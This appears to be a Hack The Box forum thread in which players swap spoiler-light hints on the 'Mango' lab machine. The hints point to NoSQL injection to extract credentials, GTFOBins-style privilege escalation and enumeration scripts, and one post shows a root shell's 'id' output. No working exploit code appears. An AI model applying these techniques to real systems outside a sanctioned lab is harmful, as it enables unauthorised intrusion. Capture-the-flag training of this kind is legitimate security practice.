Mango

Type your comment> @n00bsys0p said:

Ok, I’ve got right up to the end with user 2 and trying to run something through j*, but everything I try relating to privesc from g*b*s results in an unresponsive terminal with what looks like a shell hash at the beginning. Anyone have any pointers that will get me out of this rut? Been working on it on and off for a couple of days and getting nowhere.

don’t expect too much… no shell needed for ctf… somtimes reading is enough…

Finally got root! That juice extraction gave me a headache. Learned some new stuff.

User: If you don’t get all of the juice, just think about if you are looking at the right positions for new juice.

Root: Basic enumeration should to it!

Can anyone give me a little PM nudge as to how to enumerate the box to find the login page ?

A shout out to @3l0nMu5k for helping me get user. Learnt something new, as usual.

As for ROOT. WTF… lol It was so stupid and simple to get the flag. It was so silly that I still feel incomplete in my soul. lol I did not use GO*b . Just something super simple. :slight_smile:

Happy to help with nudges. :slight_smile:

I have some trouble in mango machines . now , i have a…n and t…2 ,m… and h…U. they are true? but i can’t connect 10.10.10.162:22 ’s SSH ,so what should i do . thx!!!

now i got root , thx for @cloudkh

The initial part was very interesting, I had never used this technique.

User: has already everything
Root: if you can’t do it from the inside, try it from the outside or change your point of view

Tnx @MrR3boot for machine

Interesting box so far…
Detected login page, can authenticate, no clue what to check next! Any hints?

Done! After some struggles and head banging. Thanks @Anonimbus for the push!

Initial Access: The name of the machine + Payloads All The Things
User: Almost same as the beginning
Root: GTFO is the place to be.

PM for push

Finally got root, woah.
Thanks to @MrR3boot for this one.

Some new techniques learned, new scripts written, basic enumeration skills renewed. Now I love mangoes even more.

Initial foothold was the hardest part for me. For all who trying to get in: you already have all the hints in this thread. Let me repeat some that really helped me:

user:

  1. Different site faces to explore, if you can not find your way try to reach the different.
  2. Mango is a key… huh, yes it’s trivial but that’s it.
  3. Check how far are you from home on every step.
  4. CS can help you with a big steps count.
  5. You will get some juicy things after all but it’s not for home use.
  6. Do not leave when you already feel like a fruit, grow yourself up to anyone you want to be.

root:

  1. Basic enumeration, really, just try some

Finally rooted :smiley:

It was an interesting machine and thanks to everyone for the nudges.

root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)

Would love someone to drop me a nudge on user. Definitely feel like I’m on the right track, but relatively new so I’ve hit a bit of a wall now and need a bit of guidance. <3

I’m stuck in under construction page, I’ve to make my injection different or what ?

Type your comment> @Arkango said:

I’m stuck in under construction page, I’ve to make my injection different or what ?

You are on the right track, maybe dump other users would help you in someway or the other?

Hi im stuck trying to get the password to bypass login page. I think i have some problem with special characters on my script. Could any one help me?
edit: nvm rooted :slight_smile:

I did not struggle at all with special chars, found a script similar to the ones in payloadallthethings that extracted both admin and pass, found that the strings library has some very nice functions

Great box. Thanks to @MrR3boot for creating it. Learned more from this box than the last 2 combined. If you need any nudges, feel free to PM me!

Please make sure not to attack any other servers outside the HTB scope. This includes requests made to any external CDNs hosting libraries and such.

Quite a fun box! Once you do it, it should be straight forward to do some of the new web challenges. Thank you, @MrR3boot , for making this available!

User: enumerate your life away! if you stumble into a page that seems not to be working, play around with it and you may realise it does work. Be persistent and you may get some juice!

Root: quite straight forward, it is hard to miss - but make sure you are using your second user.

and as they say in portuguese… “chupa essa manga!” :smiley:

Rooted! User was a pain in the but where you had to find the correct backend technology and use the correct juicer. Once you have the right usernameS though, the rest is pretty straightforward. Root was a matter of enumeration LinEnum.sh always helps me the best.

All in all a very enjoyable box, thanks @MrR3boot!

Can anyone point me in the direction of finding the vulnerable backend code that makes finding users and passwords possible? I rooted the box, but want to look at the code that makes the box the way it is. I understand Apache acts as the front end, but I am not sure where web requests go after that, is there even a backend? Or does Apache do that too?